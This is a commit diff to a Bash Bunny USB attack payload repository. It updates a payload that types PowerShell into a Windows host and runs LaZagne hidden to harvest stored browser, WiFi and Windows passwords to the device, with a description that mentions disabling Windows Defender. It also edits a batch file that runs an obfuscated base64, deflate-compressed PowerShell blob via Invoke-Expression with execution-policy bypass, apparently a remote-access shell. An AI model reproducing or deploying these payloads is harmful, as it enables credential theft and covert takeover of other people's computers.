updated payload to make drive label and switch generic

payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1

@@ -1,4 +1,5 @@
-$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber')
+$drivelabel = 'BashBunny'
+$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
 $filter = 'password_'+ $env:COMPUTERNAME
 $filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
 Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')

payloads/library/credentials/NoDefenseAgainstLaZagne/payload.txt

@@ -2,16 +2,13 @@
 #
 # Title:         Disable Windows Defender and Exfil stored passwords
 # Description:   Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... 
-#                Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: 
-#                chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. 
-#                This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload 
-#                springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.                
-#
+#                This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. 
+#                This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
 # Author:        rafa-guillermo
 # Props:         Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
-# Version:       1.0
+# Version:       1.2
 # Category:      Credentials
-# Target:        Windows 11
+# Target:        Windows
 # Tested On:     Windows 11
 # Attackmodes:   HID, STORAGE
 
@@ -22,6 +19,7 @@ LOOTDIR=/root/udisk/loot/PasswordGrabber
 LED SETUP
 GET SWITCH_POSITION
 ATTACKMODE HID STORAGE
+DRIVE_LABEL=BashBunny
 
 ######## Make Loot Dir ########
 # Setup named logs in loot directory
@@ -53,9 +51,9 @@ sleep 1
 
 # Run laZagne 
 LED STAGE2
-QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='BashBunny'\" | Select-Object -ExpandProperty DriveLetter)"
+QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
 QUACK ENTER
-QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\switch1\\payload.ps1\""
+QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
 QUACK ENTER
 QUACK STRING \& \$scriptPath
 QUACK ENTER

payloads/library/credentials/NoDefenseAgainstLaZagne/readme.md

@@ -16,7 +16,8 @@ Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads
 ## Configuration
 1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
 2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
-3. Plug your BashBunny and Enjoy
+3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
+4. Plug your BashBunny and Enjoy
 
 
 ## Info

payloads/library/remote_access/USB_Intruder/USB_Intruder/shell.bat

@@ -1,2 +1,2 @@
 @echo off
-if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")
+if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")ss